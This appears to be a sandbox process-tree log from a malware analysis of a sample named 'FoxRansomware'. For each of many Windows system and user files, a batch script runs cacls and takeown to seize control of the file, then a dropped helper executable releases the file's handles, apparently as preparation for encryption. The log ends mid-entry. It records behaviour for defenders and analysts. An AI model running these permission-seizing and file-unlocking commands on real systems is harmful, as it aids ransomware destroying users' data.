C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C3⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "VdiState.xml" -nobanner3⤵PID:4524
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"3⤵PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl""2⤵PID:5484
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl" /E /G Admin:F /C3⤵PID:5416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl"3⤵PID:6892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl" -nobanner3⤵PID:7208
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:6348
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:3448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:2688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:5840
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4732
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:6596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""2⤵PID:6316
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
PID:6076
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C3⤵PID:6160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"3⤵
- Modifies file permissions
PID:6248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "AssemblyList_4_extended.xml" -nobanner3⤵PID:6272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "AssemblyList_4_extended.xml" -nobanner4⤵
- Executes dropped EXE
PID:6304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:5292
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:6480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:6432
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵
- Executes dropped EXE
PID:5240
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:6832
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:5196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:6584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7568 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:4492
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:5208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵PID:5708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵PID:5464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:3580
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:7468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵PID:5700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵PID:7472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:2024
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:6944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:3052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "watermark.png" -nobanner3⤵PID:8180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "watermark.png" -nobanner4⤵PID:6096
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:7132
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:2816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:7172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:7344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:7192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl""2⤵
- Executes dropped EXE
PID:7464 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl"3⤵
- Modifies file permissions
PID:7648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl" -nobanner3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7644 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl" -nobanner4⤵PID:7772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""2⤵PID:5064
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C3⤵PID:2572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"3⤵
- Modifies file permissions
PID:1300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftNotepad.xml" -nobanner3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6164 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftNotepad.xml" -nobanner4⤵PID:8020
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""2⤵PID:6852
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C3⤵PID:7596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"3⤵PID:7908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner3⤵PID:7776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner4⤵PID:7848
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""2⤵PID:7328
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C3⤵PID:8008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"3⤵PID:5460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "NetworkPrinters.xml" -nobanner3⤵PID:7520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "NetworkPrinters.xml" -nobanner4⤵PID:7656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:8112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:7924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:7896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "superbar.png" -nobanner3⤵PID:3096
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "superbar.png" -nobanner4⤵PID:7396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:3020
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:8104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:5536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵
- Executes dropped EXE
PID:5820 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:6956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:5520
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:5808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵PID:6016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵PID:7532
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:5944
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:5936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵
- Modifies file permissions
PID:5860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵PID:7684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:4992
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:6124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵PID:5476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:3016
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵PID:6004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:2160
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:2872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:6976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:4548
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:1228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl""2⤵PID:5940
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl" /E /G Admin:F /C3⤵PID:5812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl"3⤵
- Modifies file permissions
PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl" -nobanner3⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl" -nobanner4⤵PID:7032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:2924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:7760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Modifies file permissions
PID:6224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:4252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:7056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl""2⤵PID:2220
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl" /E /G Admin:F /C3⤵PID:6364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl"3⤵
- Modifies file permissions
PID:6912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl" -nobanner3⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl" -nobanner4⤵PID:6408
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""2⤵PID:5912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C3⤵PID:6360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"3⤵PID:6636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "ActivitiesCache.db-shm" -nobanner3⤵PID:6256
-
